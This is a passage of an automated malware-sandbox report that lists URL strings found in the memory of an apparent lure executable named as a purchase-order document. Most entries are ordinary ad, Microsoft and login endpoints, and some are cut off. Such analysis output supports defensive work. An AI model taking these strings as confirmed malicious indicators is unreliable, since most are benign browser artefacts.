              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/check
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checks
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.php
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://csp.withgoogle.com/csp/active-view-scs-read-write-acl
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://csp.withgoogle.com/csp/ads-programmable
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://csp.withgoogle.com/csp/botguard-scs
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://csp.withgoogle.com/csp/recaptcha/1
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-acl
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/ads-programmable
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/adspam-signals-scs
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/botguard-scs
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/recaptcha
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://cvision.media.net/new/300x300/2/45/221/3/7d5dc6a9-5325-442d-926e-f2c668b8e65e.jpg?v=9
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://cvision.media.net/new/300x300/2/75/165/127/fefc2984-60ee-407b-a704-0db527f30f53.jpg?v=9
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://cxcs.microsoft.net/api/gs/en-US/xmlv2/storyset?platform=desktop&release=20h2&schema=3.0&sku=
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://cxcs.microsoft.net/api/gs/en-US/xmlv2/tip-contentset?platform=desktop&release=20h2&schema=3.
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&plat
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/5c08e5e7-4cfd-4901-acbc-79925276672c/33c540c16
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b7
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/fb5aa6fc-fb0f-43c0-9aba-9bf4642cdd05/9a3b4a8d1
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eb2.3lif
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eb2.3lift.com/sync
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259919390.0000000002351000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56258217273.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, bhvAF21.tmp.137.drString found in binary or memory: https://eb2.3lift.com/sync?
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-FRAr4b&Fr
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://evoke-windowsservices-tas.msedge.net/ab
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get.a
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get3.adobe
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get3.adobe.co
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagea
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259247304.0000000002B46000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56266296829.000000000234C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259166002.0000000002B46000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259919390.0000000002351000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259584291.0000000002B46000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259412881.0000000002B46000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259498994.000000000235D000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56266349047.0000000002351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211https://googleads.g.doubleclick.net/page
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/si
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://ib.3lift.com/sync.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://ib.adnxs.com/
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259919390.0000000002351000.00000004.00000020.00020000.00000000.sdmp, bhvAF21.tmp.137.drString found in binary or memory: https://ib.adnxs.com/async_usersync_file
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4GhRT?ver=5f90
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4GhRY?ver=52e8
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4IMai
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4IQAK
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OALs
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OAdg?ver=1c49
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OFrw?ver=d941
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OFrz?ver=8427
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OI51?ver=0686
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ONWz
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWB7v5
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWFNIa
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWFNIj
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWG0VH
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWLcTb?ver=b557
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWLuYO
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKp8YX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAMqFmF?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AANf6qa.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AANf6qa?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODMk8?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODQmd?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODept?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOEFck?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=82
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOEQ0I?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOF4WR?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOF4Xx?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFBrV?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFC5q?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFCgW?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFCgW?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFE0J?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=70
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFENj?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFJFJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFLk7?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=43
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFWV8?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFhty?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFsUC?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFu51?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFy7B?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFyKG?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=60
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOG3Y7?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOG3Y7?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOG88s?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGPXq?h=194&w=300&m=6&q=60&u=t&o=t&l=f
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGQtJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGV90?h=194&w=300&m=6&q=60&u=t&o=t&l=f&x=5
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGapF?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGlbE?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGmTG?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGyYN?h=194&w=300&m=6&q=60&u=t&o=t&l=f
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOH2Ml?h=194&w=300&m=6&q=60&u=t&o=t&l=f
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOH6xB?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB10MkbM.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB10MkbM?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB14hq0P?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aXBV1?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1cEP3G?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1cG73h?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1ftEY0?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1gEFcn?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1kc8s?m=6&o=true&u=true&n=true&w=30&h=30
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7gRE?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hg4?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_368%2Cw_622%2Cc_fill%2Cg_faces:au
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000002.56268195033.0000000002365000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000002.56267131156.0000000000193000.00000004.00000010.00020000.00000000.sdmp, bhvAF21.tmp.137.drString found in binary or memory: https://login.live.com/
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000002.56268195033.0000000002365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000002.56267131156.0000000000193000.00000004.00000010.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000002.56268417026.0000000002B5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/TI
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsign
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259919390.0000000002351000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259584291.0000000002B46000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259001522.0000000002B46000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56266700079.000000000234F000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259412881.0000000002B46000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56258841778.000000000235D000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56258217273.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56266549240.000000000234C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56258764485.0000000002B46000.00000004.00000020.00020000.00000000.sdmp, bhvAF21.tmp.137.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306842&rver=7.0.6730.0&wp=l
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259498994.000000000235D000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56258841778.000000000235D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srfhttps://www.google.com/pagead/drt/uihttps://www.google.com/recaptcha
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000002.56268195033.0000000002365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_hj8oSp9QdNfpZ07Gv-Ue0w2.css
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_qWV3sGhBzcGORhNLatPttg2.css
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedFinishStrings.en_BYvHTGVEjHmqRinYKC8bUQ2.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_fBfIO6PUjtiIRe-Q1r1v
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/WinJS_vcvx4TydCFioSeM4NLxTDw2.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.sv
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/marching_ants_white_166de53471265253ab3a456def
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90b
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/Win10HostFinish_PCore_3l9yQcHwDX6JY4dnECC1pg2.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/Win10HostLogin_PCore_rfy0-A_Y4TdpeysEFWwI1w2.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/asyncchunk/win10hostlogin_ppassword_545f714b012517
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_5b54317b5869f142bd86.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
